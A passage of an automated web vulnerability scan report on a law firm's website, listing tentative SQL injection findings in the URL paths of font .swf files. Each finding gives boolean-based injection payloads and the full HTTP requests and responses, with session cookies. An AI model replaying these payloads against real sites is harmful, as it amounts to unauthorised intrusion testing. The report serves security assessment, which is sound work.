Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...

1.52. http://www.curtis.com/sifr3/adobegaramond.swf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sifr3/adobegaramond.swf

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 11428496'%20or%201%3d1--%20 and 11428496'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sifr3/adobegaramond.swf11428496'%20or%201%3d1--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=6
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:02:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /sifr3/adobegaramond.swf11428496'%20or%201%3d2--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=6
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:02:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...

1.53. http://www.curtis.com/sifr3/garamond.swf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sifr3/garamond.swf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 38575443'%20or%201%3d1--%20 and 38575443'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sifr338575443'%20or%201%3d1--%20/garamond.swf HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; CFID=6175843; CFTOKEN=32575697; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:16:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysear
...[SNIP]...

Request 2

GET /sifr338575443'%20or%201%3d2--%20/garamond.swf HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; CFID=6175843; CFTOKEN=32575697; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:16:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
-->
...[SNIP]...

1.54. http://www.curtis.com/sifr3/garamond.swf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sifr3/garamond.swf

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 18657485'%20or%201%3d1--%20 and 18657485'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sifr3/garamond.swf18657485'%20or%201%3d1--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; CFID=6175843; CFTOKEN=32575697; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:16:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysear
...[SNIP]...

Request 2

GET /sifr3/garamond.swf18657485'%20or%201%3d2--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; CFID=6175843; CFTOKEN=32575697; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:16:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
-->
...[SNIP]...

1.55. http://www.curtis.com/sifr3/gillsans.swf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sifr3/gillsans.swf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 13597788'%20or%201%3d1--%20 and 13597788'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sifr313597788'%20or%201%3d1--%20/gillsans.swf HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=6
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:02:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /sifr313597788'%20or%201%3d2--%20/gillsans.swf HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=6
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:02:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...

1.56. http://www.curtis.com/sifr3/gillsans.swf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sifr3/gillsans.swf

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 14043355'%20or%201%3d1--%20 and 14043355'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sifr3/gillsans.swf14043355'%20or%201%3d1--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=6
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
